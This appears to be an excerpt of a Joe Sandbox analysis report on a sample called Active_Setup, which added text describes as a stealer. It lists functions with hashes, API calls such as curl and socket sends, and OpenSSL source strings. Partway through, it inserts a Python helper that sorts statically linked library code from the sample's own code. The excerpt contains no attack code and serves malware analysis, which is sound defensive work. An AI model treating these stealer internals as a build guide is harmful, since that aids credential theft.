• Opcode ID: 5803d004fb308b4bd4270a049124cb3f43489cc1191e07748edef89bb4d19fb6
• Instruction ID: 1b4ed8e47d87756f2aea8d98c7797d5d42e99b7331098157868d3d26596d8826
• Opcode Fuzzy Hash: 5803d004fb308b4bd4270a049124cb3f43489cc1191e07748edef89bb4d19fb6
• Instruction Fuzzy Hash: 8B3139316043559BE724EB69DC81FBF73D9BF94600F44846DE9C9CB241FE38940887A2
APIs
• curl_msnprintf.ACTIVE_SETUP(?,?,%04d-%02d-%02d %02d:%02d:%02d %s,-00000922,?,?,?,?,?,GMT), ref: 00FC7030
Strings
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Similarity
• API ID: curl_msnprintf
• String ID: %04d-%02d-%02d %02d:%02d:%02d %s$GMT
• API String ID: 1809024409-2925788504
• Opcode ID: 11a39e6d002e4dfc330a81d998546778d8919f87915d4b9c50910b366f8c9a8c
• Instruction ID: f233b6e7e451470620ffc2f65c0398a7128db5b990ef3ffe55fb59462a23620e
• Opcode Fuzzy Hash: 11a39e6d002e4dfc330a81d998546778d8919f87915d4b9c50910b366f8c9a8c
• Instruction Fuzzy Hash: 093148711085864FC725DB00D8F5FB7BBE5FB92309F8A80CCD0998F462E3699A5ADB50
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Similarity
• API ID: __wcstoui64
• String ID: $%
• API String ID: 3882282163-2111875603
• Opcode ID: 7c7c19cf99a09d82dfc6d814b6884f78d246d89f212c132a0f4195927562b4a5
• Instruction ID: 2e58fd2f3b8d89a740828b7331762864d7c082b5d6a421d51ac90537f2bb28df
• Opcode Fuzzy Hash: 7c7c19cf99a09d82dfc6d814b6884f78d246d89f212c132a0f4195927562b4a5
• Instruction Fuzzy Hash: E9310972E083419FD7209B39AC487AB7BD69F95324F0C4C6EE8C587341DA35D609D752
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __stat64i32
                                                                                                                                                  • String ID: %s%c%08lx.%s%d$.\crypto\x509\by_dir.c
                                                                                                                                                  • API String ID: 3188378616-2081607520
                                                                                                                                                  • Opcode ID: d665057e11f470cdb862c67859b0c0ad767b6827a8ca5f32edf72cbde53fd838
                                                                                                                                                  • Instruction ID: d8870189e0ee7d7f0f4a03bba69950506bfab383e569c458477c737b98b283f7
                                                                                                                                                  • Opcode Fuzzy Hash: d665057e11f470cdb862c67859b0c0ad767b6827a8ca5f32edf72cbde53fd838
                                                                                                                                                  • Instruction Fuzzy Hash: 2931F4B5644301ABEB20DF94CD92F6B73E9EF94710F048958F9C98B341DA35E900DBA1
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __stat64i32
                                                                                                                                                  • String ID: %s%c%08lx.%s%d$.\crypto\x509\by_dir.c
                                                                                                                                                  • API String ID: 3188378616-2081607520
                                                                                                                                                  • Opcode ID: 2745b7cfafdc7e707ba4ee76c2f3e93479873a193616dcfa949335e25daf0363
                                                                                                                                                  • Instruction ID: 64ef946c428528760392d1dd14e28174e0fb19671618c5c31044ab7a195c237d
                                                                                                                                                  • Opcode Fuzzy Hash: 2745b7cfafdc7e707ba4ee76c2f3e93479873a193616dcfa949335e25daf0363
                                                                                                                                                  • Instruction Fuzzy Hash: 5D31E5B5644301ABEB10DF94CD92F6B73E9EF94710F048958F9C98B341D635E900DBA1
                                                                                                                                                  APIs
                                                                                                                                                  • __wcstoui64.LIBCMT ref: 0102957C
                                                                                                                                                    • Part of subcall function 01081D7E: strtoxl.LIBCMT ref: 01081DA0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __wcstoui64strtoxl
                                                                                                                                                  • String ID: .\crypto\asn1\asn1_gen.c$Char=
                                                                                                                                                  • API String ID: 2058942787-708889550
                                                                                                                                                  • Opcode ID: f4e94639a99cf684bd401e52d110bc4439260105670a1a1372c32d4d3e84f241
                                                                                                                                                  • Instruction ID: e2a92e1a9236b34ba99eb765b08a1e806fa45c0639af388e1c5df291ed10df77
                                                                                                                                                  • Opcode Fuzzy Hash: f4e94639a99cf684bd401e52d110bc4439260105670a1a1372c32d4d3e84f241
                                                                                                                                                  • Instruction Fuzzy Hash: 0521D6317053315BF720AA1CAC52BDB77C49F81B19F8804AAF9C49A2C1D6AA8509C793
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset
                                                                                                                                                  • String ID: .\crypto\buffer\buffer.c
                                                                                                                                                  • API String ID: 2102423945-294840303
                                                                                                                                                  • Opcode ID: 48c07e99490eeb5eb0d51b9c59adf7ef79cc8be0d17e3ed21665294b1a2d35ca
                                                                                                                                                  • Instruction ID: 1509bdc71e072d8b8ac7d0e60461a81354ea9b0c243b8554b534f2db2776fa76
                                                                                                                                                  • Opcode Fuzzy Hash: 48c07e99490eeb5eb0d51b9c59adf7ef79cc8be0d17e3ed21665294b1a2d35ca
                                                                                                                                                  • Instruction Fuzzy Hash: 6F21FC75BC430167D6105A2EFC83B5673D59BD4B20F18883DF64DE73C5E5B4A846D160
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .\crypto\evp\evp_enc.c$b <= sizeof ctx->buf
                                                                                                                                                  • API String ID: 0-417187130
                                                                                                                                                  • Opcode ID: b6b882c27e8a94e2e56da83f1e55652772b46e160a88466a6676a83db9a33c80
                                                                                                                                                  • Instruction ID: 564debe9e0b9a589d16ed367b0a752aba3c1a993e1afc214a2e40a2250f27e18
                                                                                                                                                  • Opcode Fuzzy Hash: b6b882c27e8a94e2e56da83f1e55652772b46e160a88466a6676a83db9a33c80
                                                                                                                                                  • Instruction Fuzzy Hash: 0E21DE723843005BE764DF5CED41BEA73D5AFC4B10F04049DF9899B684D3B8E8428AA1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .\crypto\dso\dso_win32.c$symname(
                                                                                                                                                  • API String ID: 0-1441745606
                                                                                                                                                  • Opcode ID: 10130ddcec8a2b51edf06768739a9c23d81486844d7a534927cd96815eb0d6f4
                                                                                                                                                  • Instruction ID: f210b9269e85b58cb69fd0f40522b24abb444699f49836f970890eca048fdd53
                                                                                                                                                  • Opcode Fuzzy Hash: 10130ddcec8a2b51edf06768739a9c23d81486844d7a534927cd96815eb0d6f4
                                                                                                                                                  • Instruction Fuzzy Hash: ED11C8FAF8470176F260B6797C03F4732895B84F90F0D4469FB4AEE2C6E4A6E50151A5
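                                                                                                                                                   The entries in this listing give, per function, the API names and string references Joe Sandbox found next to an opcode ID and an instruction fuzzy hash. Several of the string references (`.\crypto\x509\by_dir.c`, `.\crypto\asn1\asn1_gen.c`, `.\crypto\buffer\buffer.c`, `.\crypto\evp\evp_enc.c`, `.\crypto\dso\dso_win32.c`, together with the assertion text `b <= sizeof ctx->buf`) are source-file paths consistent with OpenSSL's source tree, which marks those functions as statically linked library code rather than the stealer's own logic. The Python below is an added triage helper, not part of the Joe Sandbox report or its tooling: it parses entries pasted in this listing's layout (the sample input is constructed from the entries above, with indentation removed), splits the `String ID` field on `$` (assumed here to be the separator Joe Sandbox uses to join several strings into one field), tags entries whose strings look like OpenSSL source paths, and groups entries that share an `API String ID` so duplicated library functions can be set aside before looking at the remaining code.

```python
import re
from collections import defaultdict

# Constructed sample: five entries copied in the layout of the Execution Graph
# function list above (one "Memory Dump Source" block followed by its
# "Similarity" bullets). Raw string, so the backslashes in the paths survive.
SAMPLE_REPORT = r"""
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Similarity
• API ID: __wcstoui64
• String ID: $%
• API String ID: 3882282163-2111875603
• Opcode ID: 7c7c19cf99a09d82dfc6d814b6884f78d246d89f212c132a0f4195927562b4a5
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Similarity
• API ID: __stat64i32
• String ID: %s%c%08lx.%s%d$.\crypto\x509\by_dir.c
• API String ID: 3188378616-2081607520
• Opcode ID: d665057e11f470cdb862c67859b0c0ad767b6827a8ca5f32edf72cbde53fd838
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Similarity
• API ID: __stat64i32
• String ID: %s%c%08lx.%s%d$.\crypto\x509\by_dir.c
• API String ID: 3188378616-2081607520
• Opcode ID: 2745b7cfafdc7e707ba4ee76c2f3e93479873a193616dcfa949335e25daf0363
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Similarity
• API ID:
• String ID: .\crypto\evp\evp_enc.c$b <= sizeof ctx->buf
• API String ID: 0-417187130
• Opcode ID: b6b882c27e8a94e2e56da83f1e55652772b46e160a88466a6676a83db9a33c80
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Similarity
• API ID:
• String ID: .\crypto\dso\dso_win32.c$symname(
• API String ID: 0-1441745606
• Opcode ID: 10130ddcec8a2b51edf06768739a9c23d81486844d7a534927cd96815eb0d6f4
"""

# Assumption: a string of the form .\crypto\<dir...>\<name>.c is an OpenSSL
# source path left behind by its assertion/error macros.
OPENSSL_SOURCE = re.compile(r"^\.\\crypto\\[A-Za-z0-9_\\]+\.c$")


def parse_entries(text):
    """Split report text into one dict per 'Memory Dump Source' block.

    Every '• Key: value' bullet after the block header becomes a dict entry;
    leading indentation (as in a pasted report) is ignored."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = {}
            entries.append(current)
        elif current is not None and line.startswith("• "):
            key, _, value = line[2:].partition(":")
            current[key.strip()] = value.strip()
    return entries


def split_strings(string_id):
    """Joe Sandbox joins multiple referenced strings with '$' (assumed);
    empty pieces, e.g. from a leading '$', are dropped."""
    return [s for s in string_id.split("$") if s]


def openssl_sources(entry):
    """Return the referenced strings of one entry that look like OpenSSL source paths."""
    return [s for s in split_strings(entry.get("String ID", "")) if OPENSSL_SOURCE.match(s)]


def triage(entries):
    """Bucket entries into library (OpenSSL) vs. unattributed code and report
    functions that share an API String ID, i.e. likely duplicated code."""
    report = {"openssl": [], "unattributed": []}
    by_signature = defaultdict(list)
    for entry in entries:
        bucket = "openssl" if openssl_sources(entry) else "unattributed"
        report[bucket].append(entry["Opcode ID"])
        by_signature[entry["API String ID"]].append(entry["Opcode ID"])
    report["duplicates"] = {sig: ids for sig, ids in by_signature.items() if len(ids) > 1}
    report["source_files"] = sorted({s for e in entries for s in openssl_sources(e)})
    return report


if __name__ == "__main__":
    result = triage(parse_entries(SAMPLE_REPORT))
    print("OpenSSL source files referenced:", result["source_files"])
    print("library functions:", len(result["openssl"]), "unattributed:", len(result["unattributed"]))
    for sig, ids in result["duplicates"].items():
        print("same API String ID", sig, "->", ", ".join(i[:12] for i in ids))
```

                                                                                                                                                   Running it on the full function list (copy the whole Execution Graph section into a file and pass its contents to `parse_entries`) leaves the unattributed bucket as the set of functions worth opening in IDA; the `duplicates` map shows where the same routine was linked more than once, as with the two `__stat64i32` / `by_dir.c` entries above.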
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .\crypto\dso\dso_win32.c$symname(
                                                                                                                                                  • API String ID: 0-1441745606
                                                                                                                                                  • Opcode ID: af046cb5d71181a0edfd095107e810955fd106932c465d2ae44b67e1dd638a93
                                                                                                                                                  • Instruction ID: 8f359de888f360e5621287eb372317adcfc42ee7cfcc8a9d767dd6c121277472
                                                                                                                                                  • Opcode Fuzzy Hash: af046cb5d71181a0edfd095107e810955fd106932c465d2ae44b67e1dd638a93
                                                                                                                                                  • Instruction Fuzzy Hash: E51108B6BC430176F660B6797C03F5B328A5B84F44F0D0469FB89EE2C2E8B6E4419195
                                                                                                                                                  APIs
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP ref: 00FCA436
                                                                                                                                                    • Part of subcall function 00FC4DC0: curl_mvsnprintf.ACTIVE_SETUP(00000000,00000000,?,?,00FC108A,?,000000A0,[%s %s %s],Header,from,?,?,?,00000000,00000000), ref: 00FC4DD4
                                                                                                                                                  • SetLastError.KERNEL32(0000001C), ref: 00FCA47D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastcurl_msnprintfcurl_mvsnprintf
                                                                                                                                                  • String ID: %d.%d.%d.%d
                                                                                                                                                  • API String ID: 1074227547-3491811756
                                                                                                                                                  • Opcode ID: d3f9ee5be147f97d2c4d84892081b12379020af85ab9c3d93cfba315db9b7a32
                                                                                                                                                  • Instruction ID: 209cce1da417d6df9bff61c5f44445bf77fdb28c85c6512ca485b72b718e5963
                                                                                                                                                  • Opcode Fuzzy Hash: d3f9ee5be147f97d2c4d84892081b12379020af85ab9c3d93cfba315db9b7a32
                                                                                                                                                  • Instruction Fuzzy Hash: 761106705082864FC709DF28842AF677BE15F99700F84889DF0D287262E665D50897A3
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __time64_memset
                                                                                                                                                  • String ID: .\ssl\ssl_sess.c
                                                                                                                                                  • API String ID: 2750760331-1959455021
                                                                                                                                                  • Opcode ID: cab85e717024e23b6d95548f97856390fbae00b927267779df64445de209a716
                                                                                                                                                  • Instruction ID: 39fcf0d1b59e7e5ae8fce2c61aeddefbdb5a83e89f07965b2fde135e502994bc
                                                                                                                                                  • Opcode Fuzzy Hash: cab85e717024e23b6d95548f97856390fbae00b927267779df64445de209a716
                                                                                                                                                  • Instruction Fuzzy Hash: E21130B1A417019EE330AF7A9C01FC7FAE9AF90740F04451FE6EE9B291D7B020409BA1
                                                                                                                                                  APIs
                                                                                                                                                  • curl_mvsnprintf.ACTIVE_SETUP(00FB8A4C,00004000,tP8g,tP8g,tP8g,00000000,00FC9C63,tP8g,Callback aborted), ref: 00FC119C
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(8904C483,00000100,0109FC00,00FB8A4C), ref: 00FC11C3
                                                                                                                                                    • Part of subcall function 00FC4DC0: curl_mvsnprintf.ACTIVE_SETUP(00000000,00000000,?,?,00FC108A,?,000000A0,[%s %s %s],Header,from,?,?,?,00000000,00000000), ref: 00FC4DD4
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: curl_mvsnprintf$curl_msnprintf
                                                                                                                                                  • String ID: tP8g
                                                                                                                                                  • API String ID: 2260702874-846472870
                                                                                                                                                  • Opcode ID: 8b39f5f4446a376df44801ae7b47374d878ded9be94f02bd814c4ba118bd63c6
                                                                                                                                                  • Instruction ID: b1bdbac22a89f933a5f20f3a98233e50321e0b2968cfa1c5bd0cd30bb5364b58
                                                                                                                                                  • Opcode Fuzzy Hash: 8b39f5f4446a376df44801ae7b47374d878ded9be94f02bd814c4ba118bd63c6
                                                                                                                                                  • Instruction Fuzzy Hash: 90016871900702AED32296289D06FE337E8BB86314F18485CF99A8B043D674A544CF51
                                                                                                                                                  APIs
                                                                                                                                                  • send.WS2_32(?,?,?,00000000), ref: 00FC123F
                                                                                                                                                  • WSAGetLastError.WS2_32(?), ref: 00FC1257
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
